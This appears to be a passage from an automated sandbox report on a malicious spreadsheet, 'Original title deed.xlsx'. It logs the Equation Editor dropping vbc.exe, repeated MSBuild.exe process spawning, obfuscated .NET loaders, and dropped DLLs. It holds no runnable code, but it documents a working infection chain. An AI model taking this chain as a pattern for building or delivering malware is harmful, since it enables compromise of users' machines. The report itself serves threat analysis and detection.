Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: unknown unknown

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Original title deed.xlsx

Static file information: File size 1173504 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Source: Original title deed.xlsx

Initial sample: OLE indicators vbamacros = False

Source: Original title deed.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsxA0F3.tmp\lk95ejdjuy.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nshF115.tmp\lk95ejdjuy.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsx542B.tmp\lk95ejdjuy.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsnBAE9.tmp\lk95ejdjuy.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp\lk95ejdjuy.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsmCF90.tmp\lk95ejdjuy.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nshD819.tmp\lk95ejdjuy.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsh3B1F.tmp\lk95ejdjuy.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsm1EE8.tmp\lk95ejdjuy.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsn937.tmp\lk95ejdjuy.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsxD645.tmp\lk95ejdjuy.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nss87C.tmp\lk95ejdjuy.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsn2761.tmp\lk95ejdjuy.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsn86CF.tmp\lk95ejdjuy.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsc6BC0.tmp\lk95ejdjuy.dll	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsnEF9F.tmp\lk95ejdjuy.dll	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
